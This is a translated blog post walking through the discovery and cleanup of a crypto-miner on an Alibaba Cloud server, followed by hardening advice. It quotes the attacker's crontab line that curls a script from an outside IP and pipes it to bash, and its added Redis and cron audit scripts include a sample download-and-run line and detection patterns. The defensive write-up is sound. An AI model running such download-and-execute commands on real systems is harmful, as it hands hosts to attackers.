This is the 30th day of my participation in the First Challenge 2022. For more details, see: First Challenge 2022

Learn cloud server development together with me (if you are reading this series for the first time, the following articles are highly recommended):

Pilot: Have a server, I unexpectedly so cool?

Alternative project: write a resume page in 10 lines of code!

How to apply for a free SSL certificate for a domain name

A pagoda in Linux, a real pagoda! Detailed tutorial

Finally, a website that everyone can visit

How to send alert notifications to DingTalk using Python?

How to send tweets automatically in Python?

Finally, I “built” a job that could program anywhere, anytime

How to build a DingTalk bot that replies automatically

Use Python to make a fund query robot, can also expand!

How to install other versions of Python on Linux cloud server

Hello everyone, I am Old Cousin ~

Yesterday afternoon a friend told me that Alibaba Cloud had detected mining on his server, and the Alibaba Cloud team had then shut the server down.

Don’t panic: the easiest thing to do at this point is to open a work order (support ticket) with Alibaba Cloud and describe the problem.

Unblocking the server

Before we can troubleshoot and delete the mining program, we first need to unblock the server. Log in to the Alibaba Cloud console, then click Console -> profile picture -> Security Control to reach the relevant page.

In the penalty list you can see the relevant penalty records; click to lift the ban, and you can log in to the server normally again.

A prompt will tell you that you must find and delete the mining program within three days of lifting the ban; otherwise the server will be blocked again and cannot be unblocked a second time (which roughly means the server is gone, reclaimed by Alibaba Cloud).

Troubleshooting

How did the “hacker” log in and take control of my server?

First, look at the vulnerability management monitoring that Alibaba Cloud provides. It did report a vulnerability: Redis unauthorized access / weak password.

With an unauthenticated Redis instance, an attacker can use Redis itself to write their own public key into /root/.ssh/authorized_keys, after which they can log in over SSH as root.

So, if Redis is installed on your server, consider this problem first. The main causes are:

  • Redis allows remote login (public network access)
  • Redis has no password or a simple password

Therefore, unless the business requires it, do not expose Redis to the public network (no remote login). Beyond that, set a strong password, change the default open port, and do not start Redis as the root user, so that even someone who does reach Redis remotely cannot turn that into root privileges ~

For a detailed introduction, see this article: blog.csdn.net/fdl123456/a…
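The settings just listed can be checked mechanically. The following shell script is an added example (not code from the original post or from Alibaba Cloud): it audits a redis.conf for a public bind address, a missing or short requirepass, protected-mode turned off, and the default port. The two sample configuration files, the password in them and the mktemp paths are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a redis.conf for the
# four settings the post warns about (public bind, no/weak requirepass,
# protected-mode off, default port). The two sample configs below are
# constructed for this example; their paths come from mktemp.

# audit_redis_conf FILE: print one finding per line; exit 0 only when nothing was found
audit_redis_conf() {
    conf="$1"
    findings=0

    # 1. bind: absent, 0.0.0.0 or * means Redis listens on every interface
    bind_line=$(grep -E '^[[:space:]]*bind[[:space:]]' "$conf" | tail -n 1)
    if [ -z "$bind_line" ] || echo "$bind_line" | grep -qE '0\.0\.0\.0|[*]'; then
        echo "bind: reachable from the public network (use: bind 127.0.0.1)"
        findings=$((findings + 1))
    fi

    # 2. requirepass: missing, or too short to resist online guessing
    pass=$(grep -E '^[[:space:]]*requirepass[[:space:]]' "$conf" | tail -n 1 | awk '{print $2}')
    if [ -z "$pass" ]; then
        echo "requirepass: no password set (unauthenticated access)"
        findings=$((findings + 1))
    elif [ "${#pass}" -lt 16 ]; then
        echo "requirepass: password shorter than 16 characters"
        findings=$((findings + 1))
    fi

    # 3. protected-mode: "no" disables the built-in guard against unauthenticated remote clients
    if grep -qE '^[[:space:]]*protected-mode[[:space:]]+no' "$conf"; then
        echo "protected-mode: disabled (use: protected-mode yes)"
        findings=$((findings + 1))
    fi

    # 4. port: the default 6379 is what mass scanners try first
    if grep -qE '^[[:space:]]*port[[:space:]]+6379[[:space:]]*$' "$conf"; then
        echo "port: default 6379 (pick a non-default port)"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}

# count_redis_findings FILE: number of findings, for scripting
count_redis_findings() {
    audit_redis_conf "$1" | awk 'END { print NR }'
}

# Constructed sample 1: the exposed setup described in the post
WEAK_CONF=$(mktemp)
cat > "$WEAK_CONF" <<'EOF'
bind 0.0.0.0
port 6379
protected-mode no
EOF

# Constructed sample 2: the same instance after applying the post's advice
HARD_CONF=$(mktemp)
cat > "$HARD_CONF" <<'EOF'
bind 127.0.0.1
port 16379
protected-mode yes
requirepass Xk9vQ2mL7pR4wT8nB3hJ
EOF
trap 'rm -f "$WEAK_CONF" "$HARD_CONF"' EXIT

for f in "$WEAK_CONF" "$HARD_CONF"; do
    echo "== $f =="
    if audit_redis_conf "$f"; then
        echo "no findings"
    fi
done
```

Run it against the real file with `audit_redis_conf /etc/redis/redis.conf` (the path varies by distribution). The one point from the list above that a config file cannot show is which user the process runs as; check that separately with `ps -o user= -C redis-server`, which should not print root.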

It could have been a weak Redis setup that let the “hacker” log in to our server, but I checked, and my friend did not have Redis installed on his server.

So I kept looking for the problem. First I needed to log in to the server, and when I asked for the login password, it turned out the password was in the (Alibaba Cloud customer service) work order? A little confused, hahaha…

It turned out that this friend had earlier been unable to connect remotely because of his own login password, so he opened a work order for customer service to help change the remote connection password, and the password customer service set was probably something fairly common like Aliyun2021@zSS… So far, I suspect the remote connection password was cracked/leaked, which led to the mining program intrusion. (Everyone is welcome to correct me)

Finding the mining program

Generally speaking, if a mining program wants to keep running, it has to set up some scheduled tasks. On Linux, scheduled tasks are generally handled by cron, and users set them up with crontab.

First, run crontab -e to edit the root user’s crontab and check whether there is a scheduled task.

crontab -e

(The vim editor is used by default. To leave edit mode, press ESC and then type :wq to save and quit.) Once in the file, although I could not fully understand the command, I saw a URL and an IP address. First of all, I was very sure that the IP was not the server I was logged into, and looking at the link, it downloads a file a.sh; it smelled like mining ~

30 * * * * /bin/curl -fsSL http://104.192.82.138/sxxxxx5/a/a.sh | bash > /dev/null 2>&1

When I tried to quit, it said I did not have permission to change it? You can run ls -l /tmp/crontab.LQJ6aT to check who owns the file. You can also use sudo to force the change or deletion.

We can look up the basic information on this IP address and see that it is an American IP ~ so nine times out of ten, it’s a miner!!

Then we can keep investigating the crontab problem found above: first go into the /tmp directory and look at all the crontab-related files ~

Delete all related files with rm -rf <file name>:

sudo rm -rf crontab.*

When I ran crontab -e again, a new crontab.* file was generated, and it automatically contained the mining entry again.

If the crontab configuration is still wrong, check the system-wide configuration file with the following command.

cat /etc/crontab

I still can’t fully understand the command, but when I saw newinit.sh I knew it wasn’t good.

So I took a look at my own cloud server and found it was different.

Judging from the crontab tutorials online, my own is normal ~

Does the crontab configuration file need to be modified?
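The manual steps above (crontab -e, the files under /tmp, cat /etc/crontab, spotting the odd URL and the newinit.sh entry) can be turned into a repeatable check. The script below is an added example, not code from the original post: it scans a crontab file for the traits of the job found in this incident and also tests whether a file has been made immutable with chattr +i, which is the reason a file can refuse edits and deletion even as root. The sample crontab, including the address 203.0.113.10 from a documentation range, is constructed for this example; the pattern names and function names are mine.

```shell
#!/bin/sh
# Added example, not code from the original post: scan cron entries for the
# traits of the job found in the incident (a download-and-run one-liner, an
# every-minute schedule with discarded output, scripts kept in scratch
# directories) and check whether a file was made immutable with chattr +i,
# which is what stops root from editing or deleting it.
# The sample crontab and its address 203.0.113.10 (a documentation range)
# are constructed for this example.

DL_EXEC='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh'   # curl ... | bash
TMP_PATH='/(tmp|var/tmp|dev/shm)/'                 # payload in a scratch dir
B64_DECODE='base64[[:space:]]+(-d|--decode)'       # encoded payload
EVERY_MIN='^[[:space:]]*([*][[:space:]]+){5}'      # "* * * * *" schedule

# scan_cron_file FILE: print FILE:LINENO:line for each suspicious, non-comment line
scan_cron_file() {
    f="$1"
    [ -r "$f" ] || return 0
    grep -nE -e "$DL_EXEC" -e "$TMP_PATH" -e "$B64_DECODE" -e "$EVERY_MIN" "$f" \
        | grep -vE '^[0-9]+:[[:space:]]*#' \
        | sed "s|^|$f:|"
}

# count_cron_findings FILE: number of flagged lines, for scripting
count_cron_findings() {
    scan_cron_file "$1" | awk 'END { print NR }'
}

# scan_system_cron: walk every place cron reads on a typical Linux host
scan_system_cron() {
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
             /etc/cron.weekly/* /etc/cron.monthly/* \
             /var/spool/cron/* /var/spool/cron/crontabs/*; do
        if [ -f "$f" ]; then
            scan_cron_file "$f"
        fi
    done
}

# is_immutable FILE: true when lsattr shows the "i" attribute in its first field;
# such a file resists edits and rm even as root until "chattr -i FILE" is run
is_immutable() {
    command -v lsattr >/dev/null 2>&1 || return 1
    lsattr -d "$1" 2>/dev/null | awk '{print $1}' | grep -q i
}

# Constructed sample of /etc/crontab: two benign jobs and two like the incident's
SAMPLE_CRON=$(mktemp)
trap 'rm -f "$SAMPLE_CRON"' EXIT
cat > "$SAMPLE_CRON" <<'EOF'
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * * root /usr/local/bin/backup.sh
30 * * * * root curl -fsSL http://203.0.113.10/a/a.sh | bash > /dev/null 2>&1
* * * * * root /etc/newinit.sh > /dev/null 2>&1
EOF

echo "suspicious entries in $SAMPLE_CRON:"
scan_cron_file "$SAMPLE_CRON"
if is_immutable "$SAMPLE_CRON"; then
    echo "$SAMPLE_CRON is immutable; remove the flag first: chattr -i $SAMPLE_CRON"
fi
if [ "${1:-}" = "--system" ]; then
    scan_system_cron
fi
```

On the sample, only the curl-pipe-bash line and the every-minute newinit.sh line are reported; the two ordinary jobs are not. Running the script with `--system` walks /etc/crontab, /etc/cron.d and the per-user spool directories on the host. The every-minute rule is a heuristic (legitimate jobs use it too), so treat its hits as lines to review rather than proof of compromise; a file that `is_immutable` reports needs `chattr -i` before the `rm -rf` step above will work.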

Simple analysis of the mining program

We have to look at this shitty mining script!! The script is the file /etc/newinit.sh. We can view its contents with nano.

nano /etc/newinit.sh

This script contains 125 lines of code.

I am not familiar with Linux, so the simple analysis of the script below may be right or wrong; please point out mistakes in the comments, but no malicious attacks ~):

part one

  • Sets ulimit and changes the attributes of two directories with chattr, which modifies file attributes on Linux file systems; this is why the files earlier could not be modified even as root.

  • Disables iptables, the UFW firewall and the NMI (non-maskable interrupt) watchdog. Modifies directory permissions so that only certain files in the /tmp and /var folders can be added or deleted.

part two

  • This part is simple: it sets some file paths and then does a bunch of messy mv operations, which amount to renaming files ~

part three

  • The big one: uninstalls Alibaba Cloud’s security protection, the Server Guard (Aegis) agent.

part four

  • Mining program configuration: this zzh is an executable, probably the miner itself, and newinit.sh is the script for the mining program that is being shown here. Simply put, even if I delete the local script file, as long as it is not deleted on his side, he will download it again from his own server.

part five

  • I don’t understand this part. Maybe it checks whether the program command is normal and, if not, changes file permissions? Anyone who understands it, please add to this ~

finally

  • It looks like a function { but I did not see a closing }. Judging from its contents, the function deletes the main program’s process:
  • netstat -anp displays all kinds of network-related information,
  • grep looks up an IP or port and locates the matching row,
  • awk prints the specified fields of the text, e.g. awk '{print $7}' prints the seventh field, with fields split on spaces/tabs,
  • | is a pipe: it passes the output of the command on the left as the input of the command on the right (xargs is needed if that output should become arguments),
  • xargs converts the output of the left-hand command in a pipeline into command-line arguments and passes them to the right-hand command.

Finally, I looked at the link in the mining program configuration mentioned in part four and was surprised to see that it had 996 lines of code.

It modifies a lot of system configuration ~ if there is anything important on the server, or you had previously set up some troublesome environment, undoing the changes would be quite a hassle!

Cleaning up the mining program

The easiest way is to reset the system directly, which is what I chose here, since there is nothing to back up on my friend’s server.

As mentioned earlier, if you have a lot of important data and an environment that is hard to set up again, and you don’t want to spend the time backing up and reconfiguring, you can choose to undo the changes one by one according to the mining script… Looking at 996 lines of code makes me tired!

Resetting the system is relatively simple: enter the Alibaba Cloud console, find the corresponding instance, stop the server, then click More -> Disk and Image -> Replace Operating System.

A replacement reminder will appear; it is recommended to read it carefully.

When replacing the operating system, you can choose the same configuration as before or a different one, then click Confirm Order.

After the replacement succeeds, the server starts automatically. We can open the management console and try to log in remotely.

Here are the operations and settings we shared earlier in: How cool am I to own a server? In the figure below, you can see that the crontab configuration is normal.

Finally, looking at CPU usage after a while, you can see that it dropped from basically 100% to around 2.6% after the system reset.

Server security precautions

First of all, the premise of prevention is that it must not get in the way of our normal use; ideally every measure should still be convenient for us.

1. At present, I still recommend that readers who are new to or unfamiliar with cloud servers use the Baota (BT) panel to log in to and operate the server. For its specific functions and usage, see my previous share: A pagoda in Linux, a real pagoda! Detailed tutorial.

2. For all installed application services, try not to use the default port number, and set a password wherever one can be set. If you don’t want the bother, you can use the website 1password.com to generate random passwords; I also shared a script ~

import secrets
import string

# Characters to draw from: letters, digits and punctuation (whitespace stripped off)
ALPHABET = string.printable.strip()

while True:
    try:
        password_len = int(input('Please enter password length (number only): '))
        # secrets, not random: passwords must come from a cryptographically secure source
        password = ''.join(secrets.choice(ALPHABET) for _ in range(password_len))
        print(f'Your new password is: {password}, please save it ~')
    except Exception as e:
        print(f'Error: {e}')
    print('*** Type 0 if you want to end ***')
    print('*** Press Enter to continue generating a new password ***')
    flag = input('Continue to generate a new password: ')
    if flag == '0':
        break
    print('*' * 40)

3. Do not turn off the firewall and the security protection provided by the system.

Other methods are welcome, everyone please add your own ~ that’s all for today!

Persistence and hard work: there will be results.

Click “like” to see the message forwarding, four support. Ok, see you next time, I love the cat love technology, more love si si’s old cousin Da Mian ଘ(˙꒳˙)ଓ Di Di